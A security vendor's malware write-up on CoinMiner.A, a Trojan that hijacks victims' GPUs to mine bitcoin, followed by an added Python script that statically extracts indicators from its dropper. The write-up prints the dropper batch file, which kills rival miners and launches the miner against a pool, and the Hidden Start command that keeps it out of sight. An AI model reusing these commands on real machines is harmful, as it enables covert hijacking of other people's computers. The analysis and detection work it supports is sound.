New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

The SonicWALL UTM research team received reports of a new Bitcoin-mining Trojan in the wild. Bitcoin is a decentralized peer-to-peer crypto-currency. Generating (mining) bitcoins is computationally expensive, and a single personal computer would take an impractical amount of time to produce even one bitcoin. If, however, an attacker can compromise a handful of machines equipped with fast, highly parallel Graphics Processing Units (GPUs), mining on the victims' hardware becomes a lucrative business at no cost to the attacker. CoinMiner.A is a Trojan built for exactly this purpose.

The Trojan uses the icon shown in the original post (image not reproduced here).

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is Hidden Start, a legitimate, non-malicious utility from NTWind that runs batch files and other programs without a visible console window. The Trojan abuses it so that the victim never sees the miner's window. Its icon is shown in the original post (image not reproduced here).

wuT2.exe uses the icon shown in the original post (image not reproduced here).

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following values to the Windows registry. Both live under the key that WinRAR self-extracting archives use to remember their last extraction folder, which is consistent with the dropper being a WinRAR SFX that unpacked its payload into the Startup folder and into Temp\acc:

  • HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Start Menu\Programs\Startup = "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
  • HKEY_CURRENT_USER\Software\WinRAR SFX  C:\Documents and Settings\{USER}\Local Settings\Temp\acc = "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"

The Trojan attempts to open the following files:

  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\start.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" with the /NOCONSOLE option via the following command:

      C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"

The Trojan runs the following command to ensure internet connectivity. Because it sends 40 echo requests at roughly one-second intervals, the command also serves as a crude delay of about 40 seconds before the rest of the batch file executes, a common trick in batch-based droppers:

  • ping -n 40 google.com

As defined in "3kal.cmd", the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded. cgminer.exe is a well-known open-source GPU miner, and the mamatije.exe through mamatije4.exe names match the naming of the dropped mamatije5.exe, so the list appears intended to remove competing miners and older copies of the Trojan itself before the new miner starts:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe
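As an added example (this is not code from the SonicWALL write-up), the following Python script statically parses a dropper batch file like "3kal.cmd" and pulls out the indicators described above without executing anything: the delay introduced by the ping, the process images the script kills, and the pool server, worker name, password and thread count passed to the miner binary. The batch contents are reconstructed from the listing earlier on this page; the pool hostname is a placeholder, because the original post redacts it.

```python
"""Added example: a static parser for CoinMiner.A's dropper batch file.

Not code from the SonicWALL write-up. Given the text of a batch file like
"3kal.cmd", it extracts the indicators an analyst wants without running it.
"""
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Reconstructed from the listing in the write-up. The pool host is a
# placeholder (an assumption) because the original post redacts it.
SAMPLE_CMD = """\
ping -n 40 google.com
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im mamatije.exe
taskkill /f /im mamatije2.exe
taskkill /f /im mamatije3.exe
taskkill /f /im yaaa3.2.exe
taskkill /f /im WinMine.exe
taskkill /f /im mamatije4.exe
mamatije5.exe -a 59 -g no -o http://y.b.example.info:8332/ -u dxstr_miner -p hello -t 2
"""


@dataclass
class DropperReport:
    delay_seconds: int = 0          # "ping -n N" waits roughly N seconds on Windows
    killed_images: list = field(default_factory=list)
    miner_binary: str = ""
    raw_options: dict = field(default_factory=dict)
    pool_host: str = ""
    pool_port: int = 0
    worker: str = ""
    password: str = ""
    threads: int = 0


def parse_miner_args(argv):
    """Map "-o url -u name -g no" style options to a dict.

    A flag that is followed by another flag (or by nothing) is recorded as True.
    """
    opts = {}
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-"):
            key = tok.lstrip("-")
            if i + 1 < len(argv) and not argv[i + 1].startswith("-"):
                opts[key] = argv[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def parse_dropper(text):
    """Walk the batch file line by line and collect IOCs into a DropperReport."""
    rep = DropperReport()
    for line in text.splitlines():
        line = line.strip()
        if not line or re.match(r"(?i)rem\b|::", line):   # skip blanks and comments
            continue
        argv = shlex.split(line, posix=False)   # keep Windows tokens such as /im intact
        cmd = argv[0].lower()
        if cmd == "ping":
            m = re.search(r"-n\s+(\d+)", line, re.I)
            rep.delay_seconds += (int(m.group(1)) if m else 4)   # ping defaults to 4 echoes
        elif cmd == "taskkill":
            m = re.search(r"/im\s+(\S+)", line, re.I)
            if m:
                rep.killed_images.append(m.group(1))
        elif cmd.endswith(".exe"):
            rep.miner_binary = argv[0]
            rep.raw_options = parse_miner_args(argv[1:])

    def opt(key):
        val = rep.raw_options.get(key)
        return val if isinstance(val, str) else ""

    if opt("o"):
        parts = urlsplit(opt("o"))
        rep.pool_host = parts.hostname or ""
        rep.pool_port = parts.port or (443 if parts.scheme == "https" else 80)
    rep.worker = opt("u")
    rep.password = opt("p")
    rep.threads = int(opt("t")) if opt("t").isdigit() else 0
    return rep


def looks_like_miner_dropper(rep):
    """Heuristic: a launched binary pointed at a pool URL with worker credentials.

    In this sample the pool port is 8332, bitcoind's default JSON-RPC port,
    which getwork-era miners talked to directly.
    """
    return bool(rep.miner_binary and rep.pool_host and rep.pool_port and rep.worker)


if __name__ == "__main__":
    report = parse_dropper(SAMPLE_CMD)
    print(f"delay ~{report.delay_seconds}s, kills {report.killed_images}")
    print(f"miner {report.miner_binary} -> {report.pool_host}:{report.pool_port} "
          f"as {report.worker!r}, {report.threads} thread(s)")
    print("miner dropper:", looks_like_miner_dropper(report))
```

Running the script on the reconstructed batch file reports the 40-second delay, the eight killed images, and the pool host, port 8332, worker "dxstr_miner" and two threads; the extracted worker name and pool host are the values worth feeding into network and host detection, since they survive a rename of the miner binary.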

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins (screenshot from the original post not reproduced here).

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)